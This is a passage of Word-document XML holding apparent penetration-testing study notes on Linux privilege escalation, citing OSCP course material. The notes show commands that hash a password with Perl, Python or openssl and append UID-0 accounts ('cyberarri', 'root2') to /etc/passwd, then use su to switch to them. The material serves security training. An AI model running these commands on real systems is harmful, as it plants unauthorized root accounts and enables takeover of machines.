        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1020">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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -le 'print crypt("Password123","addedsalt")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import crypt; print crypt.crypt("Password123", "$6$salt")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E62">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E63">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding it to /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E64">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'cyberarri:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$1$SjqrkS08$C.gNf7z9v41honP.yqaR31</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:Arri:/home/cyberarri:/bin/bash' &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two zeros (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) mean the user ID (UID) and group ID (GID) are 0, which signifies root. So we just created a root user. There can be multiple root users on a machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also note that this is just a random hash. Make sure to make your own hash when you do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The entry "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Arri</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" here was for the Full name of the user, but it's a pretty useless entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E68">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E69">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su cyberarri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as this root user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.3.2. Abusing Password Authentication) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E6F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E71">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is not readable by normal users. Historically however, password hashes, along with other account information, were stored in the world-readable file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For backwards compatibility, if a password hash is present in the second column of an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user record, it is considered valid for authentication and it takes precedence over the respective entry in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, if available. This means that if we can write into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can effectively set an arbitrary password for any account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E72">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's demonstrate this. In a previous section, we showed that our Debian client may be vulnerable to privilege escalation because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions were not set correctly. To escalate our privileges, let's add another superuser (root2) and the corresponding password hash to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will first generate the password hash using the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1021">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1022">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">openssl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument. By default, if no other option is specified, openssl will generate a hash using the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1023">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1024">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">crypt algorithm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a supported hashing mechanism for Linux authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E73">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output of the OpenSSL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command may vary depending on the system executing it. On older systems, it may default to the DES algorithm, while on some newer systems it could output the password in MD5 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E74">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we have the generated hash, we will add a line to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the appropriate format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2362200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102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2E76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd w00t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="678"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E78">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E79">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in Listing 39, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">w00t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> password hash in our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> record were followed by the user id (UID) zero and the group id (GID) zero. These zero values specify that the account we created is a superuser Linux account. Finally, in order to verify that our modifications were valid, we used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to switch our standard user to the newly created </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, then issued the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to show that we indeed have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E7A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
